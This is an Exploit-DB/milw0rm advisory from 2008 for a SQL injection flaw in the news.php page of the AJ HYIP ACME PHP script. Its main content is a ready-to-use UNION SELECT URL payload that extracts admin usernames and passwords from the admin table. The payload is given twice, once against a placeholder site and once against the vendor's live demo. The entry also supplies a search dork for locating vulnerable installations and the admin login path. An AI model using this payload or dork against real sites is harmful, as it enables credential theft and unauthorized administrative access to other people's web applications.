AJ HYIP ACME - 'news.php' SQL Injection

EDB-ID:

5890

Author:

Hussin X

Type:

webapps

Platform:

PHP

Published:

2008-06-21

########################################################
#
#    HYIP ACME Version  SQL Injection Vulnerability
#========================================================
#    Author: Hussin X                                   =
#                                                       =
#    Home :  www.tryag.cc/cc                            =
#                                                       =
#    email:  darkangel_g85[at]Yahoo[DoT]com             =
#            hussin.x[at]hotmail[DoT]com                =
#                                                       =
#========================================================
#    HomE script : http://www.ajsquare.com/
#     
#    Demo : http://www.ajhyip.com/demo/acme/index.php   
#    
#
#    DorK :  Copyright Acme 2008
#
#      
##########################################################

Exploit:   


http://www.site.com/[PaTs]/news.php?id=-1+union+select+null,null,concat_ws

(0x3a,username,admin_password),0x4861636B65645F42795F48757373696E5F58,null+from+admin

--



L!VE DEMO:

http://www.ajhyip.com/demo/acme/news.php?id=-1+union+select+null,null,concat_ws

(0x3a,username,admin_password),0x4861636B65645F42795F48757373696E5F58,null+from+admin

--


LogiN:

admin/index.php


################################################################################
####################################( Greetz )##################################
#                                                                              #
#      tryag / Mr.IraQ / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUAR /str0ke          #      

#                Silic0n  / Rafi / FAHD / Iraqihack                            #       

#                                                                              #
#################################(and All IRAQIs)###############################
################################################################################

# milw0rm.com [2008-06-21]